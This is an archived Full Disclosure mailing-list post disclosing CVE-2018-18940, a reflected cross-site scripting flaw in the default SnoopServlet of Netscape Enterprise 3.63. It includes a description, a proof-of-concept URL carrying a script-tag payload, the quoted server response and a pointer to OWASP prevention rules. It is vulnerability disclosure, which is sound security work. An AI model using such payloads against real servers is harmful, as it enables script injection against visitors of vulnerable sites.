[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CANoQWWcAg_2cxfPw9r=jf+YkgCQ44cgbxSoSWZ_VBLVK0BgPww@mail.gmail.com>
Date: Tue, 6 Nov 2018 07:51:32 +0100
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.net
Subject: [FD] [CVE-2018-18940] Cross Site Scripting in default SnoopServlet
servlet Netscape Enterprise 3.63
Some time ago I discovered some vulnerabilities and did not report them
over 2003 to 2010, the time came, better late than never :-D
<!--
# Exploit Title: Cross Site Scripting in default SnoopServlet servlet
Netscape Enterprise 3.63
# Date: 05-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://en.wikipedia.org/wiki/Netscape
# Software Link: https://en.wikipedia.org/wiki/Netscape
# Version: Netscape Enterprise 3.63
# Tested on: all
# CVE : CVE-2018-18940
# Category: webapps
1. Description
The servlet/SnoopServlet (a servlet installed by default) in Netscape
Enterprise 3.63 has reflected XSS via an arbitrary parameter=[XSS] in the
query string. A remote unauthenticated attacker could potentially exploit
this vulnerability to supply malicious HTML or JavaScript code to a
vulnerable web application, which is then reflected back to the victim and
executed by the web browser.
2. Proof of Concept
http://X.X.X.X/servlet/SnoopServlet?XSS=<script>alert("XSS")</script>
The server response:
> Request URL:
>
> http://X.X.X.X/servlet/SnoopServlet
>
> Request information:
>
> Request method: GET
> Request URI: /servlet/SnoopServlet
> Request protocol: HTTP/1.1
> Servlet path: /servlet/SnoopServlet
> Path info: <none>
> Path translated: /PATHINSTALLED/netsrv2/AccessService/enterprise3.63/doc/
> Query string: PARAM=[XSS]
3. Solution:
The product is discontinued. Update to last version this product. See more
in https://en.wikipedia.org/wiki/Netscape
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists